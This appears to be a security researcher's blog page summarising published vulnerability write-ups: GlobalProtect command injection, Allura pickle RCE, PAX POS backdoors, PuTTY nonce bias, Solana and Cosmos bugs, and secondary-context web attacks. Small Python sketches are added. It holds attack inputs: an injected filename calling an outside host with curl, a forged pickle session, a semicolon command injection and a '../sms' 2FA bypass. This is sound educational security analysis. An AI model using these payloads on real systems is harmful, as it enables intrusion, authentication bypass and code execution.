Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)- 1397

WatchTowr    Reference →Posted 1 Year Ago
  • While fuzzing the GlobalProtect firewall, they noticed some interesting behavior in the logs. If they attached a semicolon to the SESSID cookie, some strange logs showed up - failed to unmarshal session(peekaboo) map, EOF. The EOF stands for end of file, which is super interesting. This is where the bug begins!
  • The EOF indicates that it's reading a file. Since we added a semicolon, no file with that name exists. Adding a slash, as if referencing a directory, gives us the nicer error failed to load file. Sick! It's reading a file and we can control the path. What about directory traversal?
  • If it cannot find the directory, it will attempt to create it. If the file doesn't exist, it simply creates a zero-byte file with the filename intact. By itself, this doesn't seem to have much impact. However, weird primitives break security assumptions that other code still relies on. So, all we have to do is find some rule that we can violate.
  • Within the telemetry code, log files are ingested. When doing this, it builds a curl command that runs through a shell to transfer the file. Now there is an arbitrary file name inside a bash command - that previous primitive seems super nice now! While playing around with this, they noticed that spaces weren't allowed within the cookie values. So, we have to get creative!
  • ${IFS} can be used in place of a space within bash. So, if we create a filename with bash metacharacters, like semicolons or backticks, we can inject arbitrary commands! For instance, creating a file in the logs directory via traversal with `curl${IFS}x1.outboundhost.com` in the name will create an outbound curl request. Neat!
  • Although not mentioned in the original post, the vulnerability appears to be within an underlying library called Gorilla sessions. So, this primitive of writing arbitrary files likely affects A LOT more things than just this application.
  • Overall, an awesome post on a bizarre command injection. It took a weird arbitrary file write to trigger, but was interesting. To me, the takeaway is that fuzzing is useful, but it's not fire-and-forget. Reading the error messages, responses and all other available information to look for weird behavior is worthwhile.
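
Under the (hypothetical) assumption that the vulnerable pattern looks roughly like the description above - an attacker-controlled filename interpolated into a shell command string - here is a minimal Python sketch of the injection. The function and host names are invented for illustration:

```python
# Hypothetical sketch of the vulnerable pattern; names are invented.
def build_telemetry_cmd(filename: str) -> str:
    # Vulnerable: the attacker-controlled filename lands inside a shell
    # command string, so bash metacharacters in it will execute.
    return f"curl --data-binary @{filename} https://telemetry.example.com/upload"

# Spaces are stripped from cookie values, so ${IFS} stands in for a space,
# and backticks make bash run the embedded command.
evil_filename = "`curl${IFS}x1.outboundhost.com`"
print(build_telemetry_cmd(evil_filename))
```

When bash evaluates the resulting command line, the backticked substring runs first, making the outbound request.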

Dangerous Import: SourceForge Patches Critical Code Vulnerability- 1396

Stefan Schiller - Sonar Source    Reference →Posted 1 Year Ago
  • Apache Allura is used by many popular products. It is a platform that manages source code, bug reports, discussions and many other things. SourceForge uses it under the hood.
  • Within the discussion area, users can import/export project data. The importer should only ever accept a URL, but the file:// scheme can be used too. The file's contents are then read from the local disk, giving both an arbitrary file read and SSRF in one bug.
  • Using this, it's possible to read /etc/passwd. However, we can do better than that! Allura contains a global secret key used to sign the sessions, which are pickle-serialized. By reading the configuration file, it's possible to steal the key! Since we can now sign our own pickle-serialized session, we get trivial code execution.
  • I think the remediation is interesting. First (and most obvious), the URL is checked to be either http/https, and there are SSRF checks to ensure that it doesn't point to a local IP. Second, the pickle session storage was replaced with a JWT implementation to prevent RCE via this route ever again. Overall, a simple bug leads to RCE in a very popular product.
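
As a sketch of why a leaked session-signing key plus pickle is game over, here is an illustrative HMAC-signed pickle scheme - not Allura's actual session format, and eval("6*7") stands in for something like os.system:

```python
import base64
import hashlib
import hmac
import pickle

SECRET = b"stolen-from-the-config-file"  # obtained via the file:// read

def sign(data: bytes) -> bytes:
    # Server-style session cookie: HMAC over the pickled payload.
    mac = hmac.new(SECRET, data, hashlib.sha256).hexdigest().encode()
    return mac + b"." + base64.b64encode(data)

class Evil:
    # pickle invokes __reduce__ during deserialization, so unpickling
    # calls an attacker-chosen function with attacker-chosen arguments.
    def __reduce__(self):
        return (eval, ("6*7",))

forged_cookie = sign(pickle.dumps(Evil()))

# The server verifies the MAC (which passes, since we hold the key)...
mac, payload = forged_cookie.split(b".", 1)
data = base64.b64decode(payload)
assert hmac.compare_digest(mac, hmac.new(SECRET, data, hashlib.sha256).hexdigest().encode())

# ...and then unpickles, which runs our code.
result = pickle.loads(data)
print(result)  # 42
```

The signature check only proves who serialized the data, not that deserializing it is safe - which is exactly why the fix swapped pickle sessions for JWTs.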

Android-based PAX POS vulnerabilities (Part 1)- 1395

stmcyber    Reference →Posted 1 Year Ago
  • Many point of sale (POS) devices are moving towards Android-based systems instead of obscure custom hardware. The authors of this post reviewed the PAX POS system for vulnerabilities. In part 1, they go through ways an attacker with local access could backdoor the device.
  • In fastboot, the hidden custom command oem paxassert can be used to overwrite the pax1 partition. This is a special partition that doesn't contain a filesystem, but rather a configuration map. Some values from this map are used in kernel parameters. From this, it is possible to inject our own kernel parameters to get root with a custom rootfs. For more information on the technique, they linked alphsecurity.
  • The unsigned partition exsn also has its contents concatenated onto the kernel parameters. So, by flashing this partition, it's possible to get code execution using the same technique as before. In practice, adding spaces easily escapes the current value and lets us add arbitrary parameters.
  • Within one of the Android apps, there is a command injection issue. It checks whether the command starts with dumpsysx. However, simply appending a semicolon after this prefix allows arbitrary commands to execute afterwards. The PoC is done via ADB, so I don't know how exploitable this actually is.
  • systool_server is a daemon exposed via Android binder with root privileges. It exposes the miniunz utility, where an attacker can pass an arbitrary number of flags plus the input/output directory. Using this and symbolic links, it is possible to get an arbitrary file write primitive, since it's running as root.
  • The systool_server tool performs multiple checks for verifying the uid to ensure only specific users can execute this API. However, these can be bypassed with LD_PRELOAD. Honestly, I don't understand HOW this bypass works but that's what they claim.
  • The final issue is a downgrade attack to an older signed (and vulnerable) version. TBH, being able to downgrade is very common functionality. For instance, what if the version you have doesn't work and you want to go backwards? Not a trivial thing to fix.
  • Overall, many of these attacks were interesting! Backdooring a device like this could be used to steal sensitive card information. Additionally, there's one CVE that's still undisclosed - I'm curious to see what it is later!
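
The dumpsysx prefix check can be sketched like this - a hypothetical reconstruction, since the post doesn't show the real code:

```python
def run_checked(cmd: str) -> str:
    # Hypothetical reconstruction of the flawed validation: only the
    # *prefix* of the attacker-controlled string is checked before the
    # whole string reaches a shell.
    if not cmd.startswith("dumpsysx"):
        raise ValueError("command not allowed")
    return cmd  # in the real app this string is handed to a shell

payload = "dumpsysx; touch /data/local/tmp/pwned"
print(run_checked(payload))  # the prefix check passes, the injection rides along
```

A startswith check validates where a string begins, not what follows - the semicolon terminates the allowed command and everything after it runs too.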

PuTTY Private Key Recovery via Biased Nonce- 1394

Marcus Brinkmann    Reference →Posted 1 Year Ago
  • The digital signature algorithm (DSA) requires a number used once (nonce). If this number isn't random, then it's trivial to recover the private key. This is how George Hotz hacked the PlayStation 3 back in the day.
  • Apparently, the nonce doesn't have to be fully known or reused - if it's merely missing some randomness, it's also possible to recover the private key. It's even one of the final challenges on cryptopals.
  • Many programs use random nonces. However, some generate them deterministically by hashing and reducing modulo the ECDSA group order, which is effectively random. For the P-521 curve, though, the 512-bit hash output is smaller than the 521-bit order, so the upper 9 bits of the nonce are guaranteed to be 0. Using the biased nonce attack, as seen in cryptopals, it's possible to recover the private key in about 521/9 ≈ 58 signatures with over 90% probability.
  • I don't understand the math on this, but it's still interesting. Crazy to find this in PuTTY, such a popular product. Many cryptography implementations have unexpected footguns and should always be reviewed by professionals.
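
The core algebra is simpler than the lattice attack. Here is a toy sketch (invented small parameters, nothing from PuTTY) of why a fully known nonce leaks the key from a single signature - the biased-nonce attack extends this to nonces where only a few bits are known:

```python
import secrets

# Toy DSA-style algebra over a small prime-order group. The signing
# equation is s = k^-1 * (h + x*r) mod q, so anyone who learns the
# nonce k can solve one signature for the private key x.
q = 2**61 - 1                       # a prime, standing in for the group order
x = secrets.randbelow(q - 1) + 1    # private key
k = secrets.randbelow(q - 1) + 1    # nonce: must stay secret and unbiased
h = secrets.randbelow(q)            # message hash
r = pow(7, k, q)                    # toy stand-in for the group operation
s = pow(k, -1, q) * (h + x * r) % q # sign

# Recovery with a known nonce: x = r^-1 * (s*k - h) mod q
recovered = pow(r, -1, q) * (s * k - h) % q
assert recovered == x
```

In the PuTTY case the nonces were never fully known - only their top 9 bits were zero - and the lattice-based attack from the cryptopals challenge stitches ~58 such partial leaks into the same recovery.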

Mandrake (PFM) Vulnerability- 1393

Justin Tieri - Strange Love    Reference →Posted 1 Year Ago
  • In the Cosmos ecosystem, there is a cross-chain communication framework called Interblockchain Communication, or IBC for short. On top of IBC, there is a middleware called the Packet Forwarding Module (PFM). PFM takes an incoming IBC tx and forwards it to the next chain in the list, allowing for multi-hop calls.
  • There are several parties involved with this:
    • Source chain: The blockchain that initiates the original IBC message.
    • Intermediary chain: The blockchain(s) that the PFM packet goes through in order to get to the destination.
    • Destination chain: The chain to which the original packet was meant to be routed.
  • When using ICS20 (which PFM uses) for token transfers, the memo stores the routing. Within ICS20, there is some magic that happens for handling assets from other chains. When going from the source to the destination, the tokens are escrowed in the source chain then a representation is minted on the destination. When going backwards, the minted token is burned and the escrowed token is unlocked. Because PFM is doing magic to route multiple ICS20 calls, there is a chance for error here.
  • PFM handles the responses from the destination chain back to the source chain for successes, errors and timeouts. However, some users were attempting to perform another PFM hop after their interaction on the destination chain, back through the intermediary and source chains. When doing this, the internal accounting of funds got messed up on the error-handling path.
  • In particular, the escrow account on the intermediary chain was not properly updating the total supply. Since the escrow account only has so many funds, the errors could leave funds inaccessible. According to the post, this bug was discovered while trying to debug an IBC client on a real network. Yikes! Luckily, it wasn't possible to steal funds using this issue.
  • The developers said that this wasn't caught because of missing test cases in their end-to-end test setup. They urge devs to write good unit, integration and e2e tests whenever possible. Another interesting bit is that testing IBC applications is hard to do - you need to set up multiple blockchains in multiple configurations, which is difficult.
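
A toy model of the escrow/mint bookkeeping described above (all names invented; the real module is far more involved):

```python
class Chain:
    def __init__(self, name: str):
        self.name = name
        self.escrow = 0   # native tokens locked for outbound transfers
        self.minted = 0   # representations of foreign tokens

def forward(src: Chain, dst: Chain, amount: int) -> None:
    # ICS20 forward path: escrow on the sender, mint on the receiver.
    src.escrow += amount
    dst.minted += amount

def refund(src: Chain, dst: Chain, amount: int) -> None:
    # Correct error path: burn the representation, release the escrow.
    dst.minted -= amount
    src.escrow -= amount

def buggy_refund(src: Chain, dst: Chain, amount: int) -> None:
    # The failure mode described above: the escrow/supply update on the
    # forwarding chain is skipped on the error path.
    dst.minted -= amount

src, mid = Chain("source"), Chain("intermediary")
forward(src, mid, 100)
buggy_refund(src, mid, 100)
print(src.escrow)  # 100 - tokens stuck in escrow, no longer reachable
```

The invariant (escrowed on one side == minted on the other) must hold on every path, including errors and timeouts - which is exactly what the missing e2e tests would have checked.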

Nonce Upon a Time, or a Total Loss of Funds - Exploring Solana Core Part 3 - 1392

Neodyme    Reference →Posted 1 Year Ago
  • Preventing the replay of previous transactions is important for the security of Solana and most blockchain systems. The obvious way would be to check whether a signature has already been seen. However, with over 150B transactions this runs into scaling problems, plus signature malleability issues. So, something else needs to be done.
  • The initial solution was to simply disallow transactions that are too old. In particular, if the transaction references an out-of-date blockhash, it can be safely ignored. This strategy doesn't work with offline signing though: if the transaction is signed offline, the blockhash may have expired by the time it's submitted. Since some users want to do things offline with their key, there needs to be another way.
  • Durable Transaction Nonces are a number used once (nonce) stored on chain ahead of time. Instead of putting the blockhash, the nonce is used. After the nonce is used, a new value is generated and stored on chain for the account. Of course, this must be done in both failed and successful calls in order to prevent unintentional execution of the transaction later. This functionality is complicated and very nuanced.
  • Most of the time, the Solana core expects all state to roll back on failure. For instance, writing to an account that you don't own will result in failure. The author points out that "Special cases lead to complexity, and complexity leads to bugs." which I couldn't agree with more! This is a little thing that, if not done correctly, could cause major havoc.
  • There is a match expression written in Rust that checks three cases - tx succeeded with nonce, tx succeeded with blockhash, and an error occurred. The success arm for the nonce case actually accepts both succeeded and failed transactions with state writes! What does this mean? Even illegal state writes, such as cross-account writes, can persist. It seems like an illegal write is treated differently than a regular failure in this context - so errors get funky, leading to the bug.
  • This completely breaks the entire security model of the system. One account can write to another account with arbitrary value. This is an absolute 100% game over, as far as Solana bugs go. At the point this bug was found, $10B was on Solana. I hope they got a huge bug bounty for this find!
  • This is a crazy bug that destroys the entire runtime. I think the authors make a really good point that sticks with me - "As a rule of thumb, we recommend that you double-check special cases and complex code". If there is interwoven logic with weird case statements, it's a great place to look for bugs. Subtle calling patterns and unexpected errors can break this code very quickly.
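
My hypothetical Python rendering of the control flow the post describes (the real code is a Rust match over execution results; all names here are invented):

```python
from enum import Enum, auto

class TxResult(Enum):
    OK = auto()
    FAILED = auto()          # ordinary failure: all writes must roll back
    ILLEGAL_WRITE = auto()   # e.g. a cross-account write that must never land

def commit_writes(uses_durable_nonce: bool, result: TxResult) -> bool:
    # For nonce transactions, state is persisted even on failure so the
    # nonce can advance - but this arm fails to exclude illegal writes.
    if uses_durable_nonce:
        return True          # BUG: ILLEGAL_WRITE persists too
    return result is TxResult.OK

assert commit_writes(False, TxResult.ILLEGAL_WRITE) is False  # normal path: safe
assert commit_writes(True, TxResult.ILLEGAL_WRITE) is True    # nonce path: broken
```

The special case (advance the nonce even on failure) quietly widened into "persist everything on failure", which is the pattern the authors warn about.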

How To Cheat The Staking Mechanism - Exploring Solana Core Part 2 - 1391

Neodyme    Reference →Posted 1 Year Ago
  • Solana is a proof-of-stake network, so the more stake you control, the more power you have in the voting process. With 2/3 of the voting power, changes to the state can be made. Clearly, ensuring that staking and voting power are accounted for properly is important.
  • To stake funds, a user 1) creates an account, 2) delegates the account and 3) becomes activated. However, parsing all of the staked chain state every block would be incredibly inefficient. So a cache (a running total) is kept instead. If something relevant to the cache changes, an update is made to the cache.
  • Solana allows active stake accounts to be merged. This closes one account and adds its stake to the other account without a cooldown. When doing this, the runtime detects the closed account by checking whether it has zero funds in it. Normally this is the case, since the merge drains the account.
  • However, there is a logic bug here - it's possible to add funds to the old staking account so that it's not properly reaped. If this is done, then the key isn't removed from the cache! So, we can reuse the same staked values in multiple accounts by exploiting this logic flaw.
  • To exploit, here are the steps:
    1. Create two staking accounts.
    2. Consolidate one account into the other.
    3. Add one lamport into the closed account.
    4. Solana core doesn't update the cache for the closed account because it has value.
    5. Recreate the vote account. The delegation is still there and the cache still doesn't get updated properly.
  • To fix the vulnerability, the check was changed to attempt to deserialize the account instead of just checking for zero funds. Overall, a super interesting post on the desync between reality and the system's understanding of reality.
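
The steps above can be modeled with a toy cache (hypothetical names, heavily simplified):

```python
# Toy model of the flawed reaping logic: an account is removed from the
# stake cache only when its balance is zero.
stake_cache = {"A": 100, "B": 100}   # cached stake weights
balances = {"A": 100, "B": 100}      # actual account balances

def merge(dst: str, src: str) -> None:
    # Merging drains the source account into the destination.
    balances[dst] += balances[src]
    balances[src] = 0

def reap(cache: dict, balances: dict) -> None:
    # BUG: cache membership is keyed off the balance, not off whether
    # the account still exists as a stake account.
    for key in list(cache):
        if balances[key] == 0:
            del cache[key]

merge("A", "B")
balances["B"] += 1   # attacker tops the closed account up by one lamport
reap(stake_cache, balances)
print(sum(stake_cache.values()))  # 200 - B's old stake is still counted
```

The cache now double-counts the merged stake: B's weight was added to A, yet B's entry survives because its balance is nonzero.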

How a Little-Known Solana Feature Made Program Vaults Unsafe - Exploring Solana Core Part 1 - 1390

Neodyme    Reference →Posted 1 Year Ago
  • Solana is a blockchain that allows for the execution of arbitrary Rust code. The main difference is that information is stored in accounts - both code and data.
  • Program Derived Addresses (PDAs) are public keys that are derived from the address of the program itself. By using a specific seed, the address can be bumped off of the elliptic curve to ensure there is no valid private key for it. To generate the PDA, the following values are concatenated then hashed: hash(seed + program_id + "ProgramDerivedAddress"). Without a mechanism like this, account creation is cumbersome because a fresh keypair must be generated for the account and used to sign the transaction.
  • As an alternative, create_with_seed was made. This is a feature of the system program, which can create an account and assign ownership to it. The address is calculated by hash(base + seed + owner).
  • These two methods are pretty similar in how they generate addresses, right? Since there are no separators or unique prefixes between the fields, there is the potential for a hash collision! There are some constraints though, such as the account being system-owned and the first 21 bytes of the program_id being valid UTF-8 (about 1 out of 180K).
  • How would this be useful? A collision like this could have allowed for an awesome rug pull mechanism, and there's no way an audit would have caught it. This was fixed by ensuring that the owner of a seeded account cannot end with ProgramDerivedAddress.
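
A sketch of the collision with plain SHA-256 (heavily simplified - the real derivations use 32-byte keys, bump seeds and off-curve checks):

```python
import hashlib

MARKER = b"ProgramDerivedAddress"

def pda(seed: bytes, program_id: bytes) -> bytes:
    # Simplified PDA derivation as described above.
    return hashlib.sha256(seed + program_id + MARKER).digest()

def create_with_seed(base: bytes, seed: bytes, owner: bytes) -> bytes:
    # Simplified create_with_seed derivation.
    return hashlib.sha256(base + seed + owner).digest()

# With no separators between fields, the concatenated byte streams can be
# made identical whenever the owner ends with the marker string:
base = b"B" * 32
owner = b"EVIL_PROGRAM" + MARKER            # owner ending in the marker
addr1 = create_with_seed(base, b"hi", owner)
addr2 = pda(seed=base + b"hi", program_id=b"EVIL_PROGRAM")
assert addr1 == addr2   # two different derivations, one address
```

Both calls hash the exact same bytes, so an attacker could pick parameters making a "plain" seeded account collide with a PDA - which is why the fix bans owners ending with the marker.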

How to freely borrow all the TVL from the Jet Protocol- 1389

Jayne    Reference →Posted 1 Year Ago
  • Jet Protocol was a lending and borrowing protocol built on Solana. The function _market_value() is used to determine the total market value of the loans that have been taken out. So, if this function were broken in some way, you would be able to bypass the protection and take out arbitrary loans.
  • Recently, the protocol had implemented the capability to close a Solana account. Upon doing this, the account is set back to Pubkey::default and some of the rent cost is refunded.
  • However, the collateral-to-loan ratio calculation in _market_value() has a fatal control flow flaw with this new functionality. It uses Pubkey::default as the sentinel that marks the end of the list. So, if an account is closed and this function is then called, the loop exits early!
  • Overall, a fairly simple issue with default values leads to a complete rug pull. To me, using a default value as a sentinel is a red flag and should be avoided for exactly this reason. Good find!
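
The sentinel flaw can be sketched as follows (hypothetical structure, not Jet's real code):

```python
DEFAULT_PUBKEY = "1" * 32   # stand-in for Pubkey::default

def market_value(positions: list) -> int:
    # Flawed pattern: the default pubkey doubles as an end-of-list
    # sentinel, so a closed account mid-list hides every later position.
    total = 0
    for pubkey, value in positions:
        if pubkey == DEFAULT_PUBKEY:
            break            # BUG: closed account treated as end of list
        total += value
    return total

positions = [("loanA", 50), (DEFAULT_PUBKEY, 0), ("loanB", 500)]
print(market_value(positions))  # 50 - the 500 loan is invisible to the check
```

An attacker who can close an account early in the list makes their later loans vanish from the collateral check, letting them borrow far more than their collateral allows.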

Attacking Secondary Contexts in Web Applications- 1388

Sam Curry    Reference →Posted 1 Year Ago
  • Web servers don't simply expose files on a server anymore. Instead, they use proxies, load balancers and fetch responses from other internal servers. Weird application routing can be used to cause some major havoc.
  • How do we identify these types of routing when we're blind? Using directory traversal and fuzzing for control characters (#,?,&,/,.@) is a good way. Another signal is changes in the response for certain directories, such as the headers of a response changing. Finally, stack traces or wrapped responses can be good indicators as well.
  • What kinds of security issues can we find with this? Data being served across extra layers causes weird issues: HTTP smuggling and CRLF injection can be found in some unusual places. Also, since developers don't expect users to control parameters and paths here, it causes havoc on the endpoint - adding debug flags or traversing up the directory can reach unintended functionality.
  • Information disclosure is a bad one here as well - internal HTTP headers and access tokens come to mind. SSRF is especially dangerous here when it returns data from the internal network instead of just making blind requests.
  • What types of issues will we run into as a hacker? Directory traversal may not work - not everything handles these sequences. Another thing is that some servers will still be authed with the same headers or cookies as the original request, making nothing exploitable. A difficult part is guessing the paths, mostly because this is blind. To get around this, we need a good mental model of the rest of the application, brute forcing and a bunch of guesswork.
  • Sam has a ton of case studies of this. One interesting case was with the Authy (2FA) integration at Pinterest. The application only checked that the request returned a 200 and that the response was {"success":true}. The code taken from the user and sent to Authy for verification was vulnerable to directory traversal. To exploit this, simply using ../sms as the 2FA code would return success and bypass the 2FA!
  • A classic case was directory traversal in invoice routing. If you knew somebody's email on this back-end service, you could traverse up twice, place an email, place an ID and fetch invoices cross-account.
  • A few takeaways for me. First, these types of bugs are out there but it's difficult to triage what to do next; innovations in blind discovery would be amazing for bug hunting. Next, sanitization of URLs is hard in these cases, leading to extremely complicated bugs. Overall, great find!
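
The Authy-style case can be sketched as a hypothetical reconstruction - a user-supplied 2FA code dropped straight into the path of an internal API request:

```python
import posixpath

# Hypothetical reconstruction of the pattern: the user's 2FA code is
# interpolated into the path of a back-end request, and the caller only
# checks for a 200 plus a {"success": true} body.
def verify_path(code: str, user_id: str) -> str:
    return f"/verify/{code}/{user_id}"

print(verify_path("123456", "42"))   # /verify/123456/42

# After dot-segment normalization (done by most HTTP stacks), the crafted
# code walks the request up to a sibling endpoint that also answers 200:
evil = verify_path("../sms", "42")
print(posixpath.normpath(evil))      # /sms/42 - a different endpoint entirely
```

Because the caller trusts any success-shaped response from the secondary context, hitting /sms (which happily returns success) passes for a valid 2FA code.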